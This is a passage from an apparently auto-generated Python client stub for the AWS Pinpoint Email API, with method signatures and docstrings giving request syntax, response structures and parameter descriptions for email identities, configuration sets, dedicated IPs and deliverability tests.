body, separated by one blank line.\n * All of the required header fields must be present in the message.\n * Each part of a multipart MIME message must be formatted properly.\n * Attachments must be in a file format that Amazon Pinpoint supports.\n * The entire message must be Base64 encoded.\n * If any of the MIME parts in your message contain content that is outside of the 7-bit ASCII character range, you should encode that content to ensure that recipients\\' email clients render the message properly.\n * The length of any single line of text in the message can\\'t exceed 1,000 characters. This restriction is defined in `RFC 5321 `__ .\n :type Tags: list\n :param Tags:\n An object that defines the tags (keys and values) that you want to associate with the predictive inbox placement test.\n - *(dict) --*\n An object that defines the tags that are associated with a resource. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Tags can help you categorize and manage resources in different ways, such as by purpose, owner, environment, or other criteria. A resource can have as many as 50 tags.\n Each tag consists of a required *tag key* and an associated *tag value* , both of which you define. A tag key is a general label that acts as a category for a more specific tag value. A tag value acts as a descriptor within a tag key. For example, if you have two versions of an Amazon Pinpoint project, one for internal testing and another for external use, you might assign a ``Stack`` tag key to both projects. The value of the ``Stack`` tag key might be ``Test`` for one project and ``Production`` for the other project.\n A tag key can contain as many as 128 characters. A tag value can contain as many as 256 characters. 
The characters can be Unicode letters, digits, white space, or one of the following symbols: _ . : / = + -. The following additional restrictions apply to tags:\n * Tag keys and values are case sensitive.\n * For each associated resource, each tag key must be unique and it can have only one value.\n * The ``aws:`` prefix is reserved for use by AWS; you can’t use it in any tag keys or values that you define. In addition, you can\'t edit or remove tag keys or values that use this prefix. Tags that use this prefix don’t count against the limit of 50 tags per resource.\n * You can associate tags with public or shared resources, but the tags are available only for your AWS account, not any other accounts that share the resource. In addition, the tags are available only for resources that are located in the specified AWS Region for your AWS account.\n - **Key** *(string) --* **[REQUIRED]**\n One part of a key-value pair that defines a tag. The maximum length of a tag key is 128 characters. The minimum length is 1 character.\n - **Value** *(string) --* **[REQUIRED]**\n The optional part of a key-value pair that defines a tag. The maximum length of a tag value is 256 characters. The minimum length is 0 characters. If you don’t want a resource to have a specific tag value, don’t specify a value for this parameter. Amazon Pinpoint will set the value to an empty string.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def create_email_identity(self, EmailIdentity: str, Tags: List = None) -> Dict:\n \"\"\"\n Verifies an email identity for use with Amazon Pinpoint. In Amazon Pinpoint, an identity is an email address or domain that you use when you send email. Before you can use an identity to send email with Amazon Pinpoint, you first have to verify it. By verifying an address, you demonstrate that you're the owner of the address, and that you've given Amazon Pinpoint permission to send email from the address.\n When you verify an email address, Amazon Pinpoint sends an email to the address. Your email address is verified as soon as you follow the link in the verification email. \n When you verify a domain, this operation provides a set of DKIM tokens, which you can convert into CNAME tokens. You add these CNAME tokens to the DNS configuration for your domain. Your domain is verified when Amazon Pinpoint detects these records in the DNS configuration for your domain. It usually takes around 72 hours to complete the domain verification process.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.create_email_identity(\n EmailIdentity='string',\n Tags=[\n {\n 'Key': 'string',\n 'Value': 'string'\n },\n ]\n )\n \n **Response Syntax**\n ::\n {\n 'IdentityType': 'EMAIL_ADDRESS'|'DOMAIN'|'MANAGED_DOMAIN',\n 'VerifiedForSendingStatus': True|False,\n 'DkimAttributes': {\n 'SigningEnabled': True|False,\n 'Status': 'PENDING'|'SUCCESS'|'FAILED'|'TEMPORARY_FAILURE'|'NOT_STARTED',\n 'Tokens': [\n 'string',\n ]\n }\n }\n \n **Response Structure**\n - *(dict) --* \n If the email identity is a domain, this object contains tokens that you can use to create a set of CNAME records. To successfully verify your domain, you have to add these records to the DNS configuration for your domain.\n If the email identity is an email address, this object is empty. \n - **IdentityType** *(string) --* \n The email identity type.\n - **VerifiedForSendingStatus** *(boolean) --* \n Specifies whether or not the identity is verified. 
In Amazon Pinpoint, you can only send email from verified email addresses or domains. For more information about verifying identities, see the `Amazon Pinpoint User Guide `__ .\n - **DkimAttributes** *(dict) --* \n An object that contains information about the DKIM attributes for the identity. This object includes the tokens that you use to create the CNAME records that are required to complete the DKIM verification process.\n - **SigningEnabled** *(boolean) --* \n If the value is ``true`` , then the messages that Amazon Pinpoint sends from the identity are DKIM-signed. If the value is ``false`` , then the messages that Amazon Pinpoint sends from the identity aren't DKIM-signed.\n - **Status** *(string) --* \n Describes whether or not Amazon Pinpoint has successfully located the DKIM records in the DNS records for the domain. The status can be one of the following:\n * ``PENDING`` – Amazon Pinpoint hasn't yet located the DKIM records in the DNS configuration for the domain, but will continue to attempt to locate them. \n * ``SUCCESS`` – Amazon Pinpoint located the DKIM records in the DNS configuration for the domain and determined that they're correct. Amazon Pinpoint can now send DKIM-signed email from the identity. \n * ``FAILED`` – Amazon Pinpoint was unable to locate the DKIM records in the DNS settings for the domain, and won't continue to search for them. \n * ``TEMPORARY_FAILURE`` – A temporary issue occurred, which prevented Amazon Pinpoint from determining the DKIM status for the domain. \n * ``NOT_STARTED`` – Amazon Pinpoint hasn't yet started searching for the DKIM records in the DKIM records for the domain. \n - **Tokens** *(list) --* \n A set of unique strings that you use to create a set of CNAME records that you add to the DNS configuration for your domain. When Amazon Pinpoint detects these records in the DNS configuration for your domain, the DKIM authentication process is complete. Amazon Pinpoint usually detects these records within about 72 hours of adding them to the DNS configuration for your domain.\n - *(string) --* \n :type EmailIdentity: string\n :param EmailIdentity: **[REQUIRED]**\n The email address or domain that you want to verify.\n :type Tags: list\n :param Tags:\n An object that defines the tags (keys and values) that you want to associate with the email identity.\n - *(dict) --*\n An object that defines the tags that are associated with a resource. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Tags can help you categorize and manage resources in different ways, such as by purpose, owner, environment, or other criteria. A resource can have as many as 50 tags.\n Each tag consists of a required *tag key* and an associated *tag value* , both of which you define. A tag key is a general label that acts as a category for a more specific tag value. A tag value acts as a descriptor within a tag key. For example, if you have two versions of an Amazon Pinpoint project, one for internal testing and another for external use, you might assign a ``Stack`` tag key to both projects. The value of the ``Stack`` tag key might be ``Test`` for one project and ``Production`` for the other project.\n A tag key can contain as many as 128 characters. A tag value can contain as many as 256 characters. The characters can be Unicode letters, digits, white space, or one of the following symbols: _ . : / = + -. 
The following additional restrictions apply to tags:\n * Tag keys and values are case sensitive.\n * For each associated resource, each tag key must be unique and it can have only one value.\n * The ``aws:`` prefix is reserved for use by AWS; you can’t use it in any tag keys or values that you define. In addition, you can\\'t edit or remove tag keys or values that use this prefix. Tags that use this prefix don’t count against the limit of 50 tags per resource.\n * You can associate tags with public or shared resources, but the tags are available only for your AWS account, not any other accounts that share the resource. In addition, the tags are available only for resources that are located in the specified AWS Region for your AWS account.\n - **Key** *(string) --* **[REQUIRED]**\n One part of a key-value pair that defines a tag. The maximum length of a tag key is 128 characters. The minimum length is 1 character.\n - **Value** *(string) --* **[REQUIRED]**\n The optional part of a key-value pair that defines a tag. The maximum length of a tag value is 256 characters. The minimum length is 0 characters. If you don’t want a resource to have a specific tag value, don’t specify a value for this parameter. Amazon Pinpoint will set the value to an empty string.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def delete_configuration_set(self, ConfigurationSetName: str) -> Dict:\n \"\"\"\n Delete an existing configuration set.\n In Amazon Pinpoint, *configuration sets* are groups of rules that you can apply to the emails you send. You apply a configuration set to an email by including a reference to the configuration set in the headers of the email. When you apply a configuration set to an email, all of the rules in that configuration set are applied to the email.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.delete_configuration_set(\n ConfigurationSetName='string'\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that you want to delete.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def delete_configuration_set_event_destination(self, ConfigurationSetName: str, EventDestinationName: str) -> Dict:\n \"\"\"\n Delete an event destination.\n In Amazon Pinpoint, *events* include message sends, deliveries, opens, clicks, bounces, and complaints. *Event destinations* are places that you can send information about these events to. 
For example, you can send event data to Amazon SNS to receive notifications when you receive bounces or complaints, or you can use Amazon Kinesis Data Firehose to stream data to Amazon S3 for long-term storage.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.delete_configuration_set_event_destination(\n ConfigurationSetName='string',\n EventDestinationName='string'\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that contains the event destination that you want to delete.\n :type EventDestinationName: string\n :param EventDestinationName: **[REQUIRED]**\n The name of the event destination that you want to delete.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def delete_dedicated_ip_pool(self, PoolName: str) -> Dict:\n \"\"\"\n Delete a dedicated IP pool.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.delete_dedicated_ip_pool(\n PoolName='string'\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type PoolName: string\n :param PoolName: **[REQUIRED]**\n The name of the dedicated IP pool that you want to delete.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def delete_email_identity(self, EmailIdentity: str) -> Dict:\n \"\"\"\n Deletes an email identity that you previously verified for use with Amazon Pinpoint. An identity can be either an email address or a domain name.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.delete_email_identity(\n EmailIdentity='string'\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type EmailIdentity: string\n :param EmailIdentity: **[REQUIRED]**\n The identity (that is, the email address or domain) that you want to delete from your Amazon Pinpoint account.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):\n \"\"\"\n Generate a presigned url given a client, its method, and arguments\n :type ClientMethod: string\n :param ClientMethod: The client method to presign for\n :type Params: dict\n :param Params: The parameters normally passed to\n ``ClientMethod``.\n :type ExpiresIn: int\n :param ExpiresIn: The number of seconds the presigned url is valid\n for. By default it expires in an hour (3600 seconds)\n :type HttpMethod: string\n :param HttpMethod: The http method to use on the generated url. 
By\n default, the http method is whatever is used in the method\\'s model.\n :returns: The presigned url\n \"\"\"\n pass\n\n def get_account(self) -> Dict:\n \"\"\"\n Obtain information about the email-sending status and capabilities of your Amazon Pinpoint account in the current AWS Region.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_account()\n \n **Response Syntax**\n ::\n {\n 'SendQuota': {\n 'Max24HourSend': 123.0,\n 'MaxSendRate': 123.0,\n 'SentLast24Hours': 123.0\n },\n 'SendingEnabled': True|False,\n 'DedicatedIpAutoWarmupEnabled': True|False,\n 'EnforcementStatus': 'string',\n 'ProductionAccessEnabled': True|False\n }\n \n **Response Structure**\n - *(dict) --* \n A list of details about the email-sending capabilities of your Amazon Pinpoint account in the current AWS Region.\n - **SendQuota** *(dict) --* \n An object that contains information about the per-day and per-second sending limits for your Amazon Pinpoint account in the current AWS Region.\n - **Max24HourSend** *(float) --* \n The maximum number of emails that you can send in the current AWS Region over a 24-hour period. This value is also called your *sending quota* .\n - **MaxSendRate** *(float) --* \n The maximum number of emails that you can send per second in the current AWS Region. This value is also called your *maximum sending rate* or your *maximum TPS (transactions per second) rate* .\n - **SentLast24Hours** *(float) --* \n The number of emails sent from your Amazon Pinpoint account in the current AWS Region over the past 24 hours.\n - **SendingEnabled** *(boolean) --* \n Indicates whether or not email sending is enabled for your Amazon Pinpoint account in the current AWS Region.\n - **DedicatedIpAutoWarmupEnabled** *(boolean) --* \n Indicates whether or not the automatic warm-up feature is enabled for dedicated IP addresses that are associated with your account.\n - **EnforcementStatus** *(string) --* \n The reputation status of your Amazon Pinpoint account. The status can be one of the following:\n * ``HEALTHY`` – There are no reputation-related issues that currently impact your account. \n * ``PROBATION`` – We've identified some issues with your Amazon Pinpoint account. We're placing your account under review while you work on correcting these issues. \n * ``SHUTDOWN`` – Your account's ability to send email is currently paused because of an issue with the email sent from your account. When you correct the issue, you can contact us and request that your account's ability to send email is resumed. \n - **ProductionAccessEnabled** *(boolean) --* \n Indicates whether or not your account has production access in the current AWS Region.\n If the value is ``false`` , then your account is in the *sandbox* . When your account is in the sandbox, you can only send email to verified identities. Additionally, the maximum number of emails you can send in a 24-hour period (your sending quota) is 200, and the maximum number of emails you can send per second (your maximum sending rate) is 1.\n If the value is ``true`` , then your account has production access. When your account has production access, you can send email to any address. 
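(Illustrative aside, not part of the generated reference: a minimal sketch of checking for sandbox restrictions with this operation, assuming ``client`` was created with ``boto3.client('pinpoint-email')``.)\n ::\n account = client.get_account()\n if not account['ProductionAccessEnabled']:\n     # Sandbox accounts can only send to verified identities.\n     print('Account is in the sandbox; request production access before sending broadly.')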
The sending quota and maximum sending rate for your account vary based on your specific use case.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_blacklist_reports(self, BlacklistItemNames: List) -> Dict:\n \"\"\"\n Retrieve a list of the blacklists that your dedicated IP addresses appear on.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_blacklist_reports(\n BlacklistItemNames=[\n 'string',\n ]\n )\n \n **Response Syntax**\n ::\n {\n 'BlacklistReport': {\n 'string': [\n {\n 'RblName': 'string',\n 'ListingTime': datetime(2015, 1, 1),\n 'Description': 'string'\n },\n ]\n }\n }\n \n **Response Structure**\n - *(dict) --* \n An object that contains information about blacklist events.\n - **BlacklistReport** *(dict) --* \n An object that contains information about a blacklist that one of your dedicated IP addresses appears on.\n - *(string) --* \n An IP address that you want to obtain blacklist information for.\n - *(list) --* \n - *(dict) --* \n An object that contains information about a blacklisting event that impacts one of the dedicated IP addresses that is associated with your account.\n - **RblName** *(string) --* \n The name of the blacklist that the IP address appears on.\n - **ListingTime** *(datetime) --* \n The time when the blacklisting event occurred, shown in Unix time format.\n - **Description** *(string) --* \n Additional information about the blacklisting event, as provided by the blacklist maintainer.\n :type BlacklistItemNames: list\n :param BlacklistItemNames: **[REQUIRED]**\n A list of IP addresses that you want to retrieve blacklist information about. You can only specify the dedicated IP addresses that you use to send email using Amazon Pinpoint or Amazon SES.\n - *(string) --*\n An IP address that you want to obtain blacklist information for.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_configuration_set(self, ConfigurationSetName: str) -> Dict:\n \"\"\"\n Get information about an existing configuration set, including the dedicated IP pool that it's associated with, whether or not it's enabled for sending email, and more.\n In Amazon Pinpoint, *configuration sets* are groups of rules that you can apply to the emails you send. You apply a configuration set to an email by including a reference to the configuration set in the headers of the email. 
When you apply a configuration set to an email, all of the rules in that configuration set are applied to the email.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_configuration_set(\n ConfigurationSetName='string'\n )\n \n **Response Syntax**\n ::\n {\n 'ConfigurationSetName': 'string',\n 'TrackingOptions': {\n 'CustomRedirectDomain': 'string'\n },\n 'DeliveryOptions': {\n 'SendingPoolName': 'string'\n },\n 'ReputationOptions': {\n 'ReputationMetricsEnabled': True|False,\n 'LastFreshStart': datetime(2015, 1, 1)\n },\n 'SendingOptions': {\n 'SendingEnabled': True|False\n }\n }\n \n **Response Structure**\n - *(dict) --* \n Information about a configuration set.\n - **ConfigurationSetName** *(string) --* \n The name of the configuration set.\n - **TrackingOptions** *(dict) --* \n An object that defines the open and click tracking options for emails that you send using the configuration set.\n - **CustomRedirectDomain** *(string) --* \n The domain that you want to use for tracking open and click events.\n - **DeliveryOptions** *(dict) --* \n An object that defines the dedicated IP pool that is used to send emails that you send using the configuration set.\n - **SendingPoolName** *(string) --* \n The name of the dedicated IP pool that you want to associate with the configuration set.\n - **ReputationOptions** *(dict) --* \n An object that defines whether or not Amazon Pinpoint collects reputation metrics for the emails that you send that use the configuration set.\n - **ReputationMetricsEnabled** *(boolean) --* \n If ``true`` , tracking of reputation metrics is enabled for the configuration set. If ``false`` , tracking of reputation metrics is disabled for the configuration set.\n - **LastFreshStart** *(datetime) --* \n The date and time (in Unix time) when the reputation metrics were last given a fresh start. When your account is given a fresh start, your reputation metrics are calculated starting from the date of the fresh start.\n - **SendingOptions** *(dict) --* \n An object that defines whether or not Amazon Pinpoint can send email that you send using the configuration set.\n - **SendingEnabled** *(boolean) --* \n If ``true`` , email sending is enabled for the configuration set. If ``false`` , email sending is disabled for the configuration set.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that you want to obtain more information about.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_configuration_set_event_destinations(self, ConfigurationSetName: str) -> Dict:\n \"\"\"\n Retrieve a list of event destinations that are associated with a configuration set.\n In Amazon Pinpoint, *events* include message sends, deliveries, opens, clicks, bounces, and complaints. *Event destinations* are places that you can send information about these events to. 
For example, you can send event data to Amazon SNS to receive notifications when you receive bounces or complaints, or you can use Amazon Kinesis Data Firehose to stream data to Amazon S3 for long-term storage.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_configuration_set_event_destinations(\n ConfigurationSetName='string'\n )\n \n **Response Syntax**\n ::\n {\n 'EventDestinations': [\n {\n 'Name': 'string',\n 'Enabled': True|False,\n 'MatchingEventTypes': [\n 'SEND'|'REJECT'|'BOUNCE'|'COMPLAINT'|'DELIVERY'|'OPEN'|'CLICK'|'RENDERING_FAILURE',\n ],\n 'KinesisFirehoseDestination': {\n 'IamRoleArn': 'string',\n 'DeliveryStreamArn': 'string'\n },\n 'CloudWatchDestination': {\n 'DimensionConfigurations': [\n {\n 'DimensionName': 'string',\n 'DimensionValueSource': 'MESSAGE_TAG'|'EMAIL_HEADER'|'LINK_TAG',\n 'DefaultDimensionValue': 'string'\n },\n ]\n },\n 'SnsDestination': {\n 'TopicArn': 'string'\n },\n 'PinpointDestination': {\n 'ApplicationArn': 'string'\n }\n },\n ]\n }\n \n **Response Structure**\n - *(dict) --* \n Information about an event destination for a configuration set.\n - **EventDestinations** *(list) --* \n An array that includes all of the events destinations that have been configured for the configuration set.\n - *(dict) --* \n In Amazon Pinpoint, *events* include message sends, deliveries, opens, clicks, bounces, and complaints. *Event destinations* are places that you can send information about these events to. For example, you can send event data to Amazon SNS to receive notifications when you receive bounces or complaints, or you can use Amazon Kinesis Data Firehose to stream data to Amazon S3 for long-term storage.\n - **Name** *(string) --* \n A name that identifies the event destination.\n - **Enabled** *(boolean) --* \n If ``true`` , the event destination is enabled. When the event destination is enabled, the specified event types are sent to the destinations in this ``EventDestinationDefinition`` .\n If ``false`` , the event destination is disabled. When the event destination is disabled, events aren't sent to the specified destinations.\n - **MatchingEventTypes** *(list) --* \n The types of events that Amazon Pinpoint sends to the specified event destinations.\n - *(string) --* \n An email sending event type. For example, email sends, opens, and bounces are all email events.\n - **KinesisFirehoseDestination** *(dict) --* \n An object that defines an Amazon Kinesis Data Firehose destination for email events. You can use Amazon Kinesis Data Firehose to stream data to other services, such as Amazon S3 and Amazon Redshift.\n - **IamRoleArn** *(string) --* \n The Amazon Resource Name (ARN) of the IAM role that Amazon Pinpoint uses when sending email events to the Amazon Kinesis Data Firehose stream.\n - **DeliveryStreamArn** *(string) --* \n The Amazon Resource Name (ARN) of the Amazon Kinesis Data Firehose stream that Amazon Pinpoint sends email events to.\n - **CloudWatchDestination** *(dict) --* \n An object that defines an Amazon CloudWatch destination for email events. 
You can use Amazon CloudWatch to monitor and gain insights on your email sending metrics.\n - **DimensionConfigurations** *(list) --* \n An array of objects that define the dimensions to use when you send email events to Amazon CloudWatch.\n - *(dict) --* \n An object that defines the dimension configuration to use when you send Amazon Pinpoint email events to Amazon CloudWatch.\n - **DimensionName** *(string) --* \n The name of an Amazon CloudWatch dimension associated with an email sending metric. The name has to meet the following criteria:\n * It can only contain ASCII letters (a-z, A-Z), numbers (0-9), underscores (_), or dashes (-). \n * It can contain no more than 256 characters. \n - **DimensionValueSource** *(string) --* \n The location where Amazon Pinpoint finds the value of a dimension to publish to Amazon CloudWatch. If you want Amazon Pinpoint to use the message tags that you specify using an X-SES-MESSAGE-TAGS header or a parameter to the SendEmail/SendRawEmail API, choose ``messageTag`` . If you want Amazon Pinpoint to use your own email headers, choose ``emailHeader`` . If you want Amazon Pinpoint to use link tags, choose ``linkTags`` .\n - **DefaultDimensionValue** *(string) --* \n The default value of the dimension that is published to Amazon CloudWatch if you don't provide the value of the dimension when you send an email. This value has to meet the following criteria:\n * It can only contain ASCII letters (a-z, A-Z), numbers (0-9), underscores (_), or dashes (-). \n * It can contain no more than 256 characters. \n - **SnsDestination** *(dict) --* \n An object that defines an Amazon SNS destination for email events. You can use Amazon SNS to send notifications when certain email events occur.\n - **TopicArn** *(string) --* \n The Amazon Resource Name (ARN) of the Amazon SNS topic that you want to publish email events to. For more information about Amazon SNS topics, see the `Amazon SNS Developer Guide `__ .\n - **PinpointDestination** *(dict) --* \n An object that defines an Amazon Pinpoint destination for email events. You can use Amazon Pinpoint events to create attributes in Amazon Pinpoint projects. You can use these attributes to create segments for your campaigns.\n - **ApplicationArn** *(string) --* \n The Amazon Resource Name (ARN) of the Amazon Pinpoint project that you want to send email events to.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that contains the event destination.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_dedicated_ip(self, Ip: str) -> Dict:\n \"\"\"\n Get information about a dedicated IP address, including the name of the dedicated IP pool that it's associated with, as well as information about the automatic warm-up process for the address.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_dedicated_ip(\n Ip='string'\n )\n \n **Response Syntax**\n ::\n {\n 'DedicatedIp': {\n 'Ip': 'string',\n 'WarmupStatus': 'IN_PROGRESS'|'DONE',\n 'WarmupPercentage': 123,\n 'PoolName': 'string'\n }\n }\n \n **Response Structure**\n - *(dict) --* \n Information about a dedicated IP address.\n - **DedicatedIp** *(dict) --* \n An object that contains information about a dedicated IP address.\n - **Ip** *(string) --* \n An IP address that is reserved for use by your Amazon Pinpoint account.\n - **WarmupStatus** *(string) --* \n The warm-up status of a dedicated IP address. 
The status can have one of the following values:\n * ``IN_PROGRESS`` – The IP address isn't ready to use because the dedicated IP warm-up process is ongoing. \n * ``DONE`` – The dedicated IP warm-up process is complete, and the IP address is ready to use. \n - **WarmupPercentage** *(integer) --* \n Indicates how complete the dedicated IP warm-up process is. When this value equals 1, the address has completed the warm-up process and is ready for use.\n - **PoolName** *(string) --* \n The name of the dedicated IP pool that the IP address is associated with.\n :type Ip: string\n :param Ip: **[REQUIRED]**\n The IP address that you want to obtain more information about. The value you specify has to be a dedicated IP address that\'s associated with your Amazon Pinpoint account.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_dedicated_ips(self, PoolName: str = None, NextToken: str = None, PageSize: int = None) -> Dict:\n \"\"\"\n List the dedicated IP addresses that are associated with your Amazon Pinpoint account.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_dedicated_ips(\n PoolName='string',\n NextToken='string',\n PageSize=123\n )\n \n **Response Syntax**\n ::\n {\n 'DedicatedIps': [\n {\n 'Ip': 'string',\n 'WarmupStatus': 'IN_PROGRESS'|'DONE',\n 'WarmupPercentage': 123,\n 'PoolName': 'string'\n },\n ],\n 'NextToken': 'string'\n }\n \n **Response Structure**\n - *(dict) --* \n Information about the dedicated IP addresses that are associated with your Amazon Pinpoint account.\n - **DedicatedIps** *(list) --* \n A list of dedicated IP addresses that are reserved for use by your Amazon Pinpoint account.\n - *(dict) --* \n Contains information about a dedicated IP address that is associated with your Amazon Pinpoint account.\n - **Ip** *(string) --* \n An IP address that is reserved for use by your Amazon Pinpoint account.\n - **WarmupStatus** *(string) --* \n The warm-up status of a dedicated IP address. The status can have one of the following values:\n * ``IN_PROGRESS`` – The IP address isn't ready to use because the dedicated IP warm-up process is ongoing. \n * ``DONE`` – The dedicated IP warm-up process is complete, and the IP address is ready to use. \n - **WarmupPercentage** *(integer) --* \n Indicates how complete the dedicated IP warm-up process is. When this value equals 1, the address has completed the warm-up process and is ready for use.\n - **PoolName** *(string) --* \n The name of the dedicated IP pool that the IP address is associated with.\n - **NextToken** *(string) --* \n A token that indicates that there are additional dedicated IP addresses to list. To view additional addresses, issue another request to ``GetDedicatedIps`` , passing this token in the ``NextToken`` parameter.\n :type PoolName: string\n :param PoolName:\n The name of the IP pool that the dedicated IP address is associated with.\n :type NextToken: string\n :param NextToken:\n A token returned from a previous call to ``GetDedicatedIps`` to indicate the position of the dedicated IP pool in the list of IP pools.\n :type PageSize: integer\n :param PageSize:\n The number of results to show in a single call to ``GetDedicatedIps`` . 
If the number of results is larger than the number you specified in this parameter, then the response includes a ``NextToken`` element, which you can use to obtain additional results.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_deliverability_dashboard_options(self) -> Dict:\n \"\"\"\n Show the status of the Deliverability dashboard. When the Deliverability dashboard is enabled, you gain access to reputation metrics for the domains that you use to send email using Amazon Pinpoint. You also gain the ability to perform predictive inbox placement tests.\n When you use the Deliverability dashboard, you pay a monthly charge of USD$1,250.00, in addition to any other fees that you accrue by using Amazon Pinpoint. If you enable the Deliverability dashboard after the first day of a calendar month, AWS prorates the monthly charge based on how many days have elapsed in the current calendar month.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_deliverability_dashboard_options()\n \n **Response Syntax**\n ::\n {\n 'DashboardEnabled': True|False\n }\n \n **Response Structure**\n - *(dict) --* \n An object that shows the status of the Deliverability dashboard for your Amazon Pinpoint account.\n - **DashboardEnabled** *(boolean) --* \n Indicates whether the Deliverability dashboard is enabled. If the value is ``true`` , then the dashboard is enabled.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_deliverability_test_report(self, ReportId: str) -> Dict:\n \"\"\"\n Retrieve the results of a predictive inbox placement test.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_deliverability_test_report(\n ReportId='string'\n )\n \n **Response Syntax**\n ::\n {\n 'DeliverabilityTestReport': {\n 'ReportId': 'string',\n 'ReportName': 'string',\n 'Subject': 'string',\n 'FromEmailAddress': 'string',\n 'CreateDate': datetime(2015, 1, 1),\n 'DeliverabilityTestStatus': 'IN_PROGRESS'|'COMPLETED'\n },\n 'OverallPlacement': {\n 'InboxPercentage': 123.0,\n 'SpamPercentage': 123.0,\n 'MissingPercentage': 123.0,\n 'SpfPercentage': 123.0,\n 'DkimPercentage': 123.0\n },\n 'IspPlacements': [\n {\n 'IspName': 'string',\n 'PlacementStatistics': {\n 'InboxPercentage': 123.0,\n 'SpamPercentage': 123.0,\n 'MissingPercentage': 123.0,\n 'SpfPercentage': 123.0,\n 'DkimPercentage': 123.0\n }\n },\n ],\n 'Message': 'string'\n }\n \n **Response Structure**\n - *(dict) --* \n The results of the predictive inbox placement test.\n - **DeliverabilityTestReport** *(dict) --* \n An object that contains the results of the predictive inbox placement test.\n - **ReportId** *(string) --* \n A unique string that identifies the predictive inbox placement test.\n - **ReportName** *(string) --* \n A name that helps you identify a predictive inbox placement test report.\n - **Subject** *(string) --* \n The subject line for an email that you submitted in a predictive inbox placement test.\n - **FromEmailAddress** *(string) --* \n The sender address that you specified for the predictive inbox placement test.\n - **CreateDate** *(datetime) --* \n The date and time when the predictive inbox placement test was created, in Unix time format.\n - **DeliverabilityTestStatus** *(string) --* \n The status of the predictive inbox placement test. If the status is ``IN_PROGRESS`` , then the predictive inbox placement test is currently running. Predictive inbox placement tests are usually complete within 24 hours of creating the test. 
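(Illustrative aside, not part of the generated reference: a minimal sketch of polling a test until it finishes, assuming ``client`` is the Pinpoint Email client and ``report_id`` holds a ``ReportId`` returned by ``create_deliverability_test_report``.)\n ::\n import time\n while True:\n     report = client.get_deliverability_test_report(ReportId=report_id)\n     if report['DeliverabilityTestReport']['DeliverabilityTestStatus'] == 'COMPLETED':\n         break\n     # Tests usually finish within about 24 hours, so poll infrequently.\n     time.sleep(3600)\n print(report['OverallPlacement']['InboxPercentage'])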
If the status is ``COMPLETE`` , then the test is finished, and you can use the ``GetDeliverabilityTestReport`` to view the results of the test.\n - **OverallPlacement** *(dict) --* \n An object that specifies how many test messages that were sent during the predictive inbox placement test were delivered to recipients' inboxes, how many were sent to recipients' spam folders, and how many weren't delivered.\n - **InboxPercentage** *(float) --* \n The percentage of emails that arrived in recipients' inboxes during the predictive inbox placement test.\n - **SpamPercentage** *(float) --* \n The percentage of emails that arrived in recipients' spam or junk mail folders during the predictive inbox placement test.\n - **MissingPercentage** *(float) --* \n The percentage of emails that didn't arrive in recipients' inboxes at all during the predictive inbox placement test.\n - **SpfPercentage** *(float) --* \n The percentage of emails that were authenticated by using Sender Policy Framework (SPF) during the predictive inbox placement test.\n - **DkimPercentage** *(float) --* \n The percentage of emails that were authenticated by using DomainKeys Identified Mail (DKIM) during the predictive inbox placement test.\n - **IspPlacements** *(list) --* \n An object that describes how the test email was handled by several email providers, including Gmail, Hotmail, Yahoo, AOL, and others.\n - *(dict) --* \n An object that describes how email sent during the predictive inbox placement test was handled by a certain email provider.\n - **IspName** *(string) --* \n The name of the email provider that the inbox placement data applies to.\n - **PlacementStatistics** *(dict) --* \n An object that contains inbox placement metrics for a specific email provider.\n - **InboxPercentage** *(float) --* \n The percentage of emails that arrived in recipients' inboxes during the predictive inbox placement test.\n - **SpamPercentage** *(float) --* \n The percentage of emails that arrived in recipients' spam or junk mail folders during the predictive inbox placement test.\n - **MissingPercentage** *(float) --* \n The percentage of emails that didn't arrive in recipients' inboxes at all during the predictive inbox placement 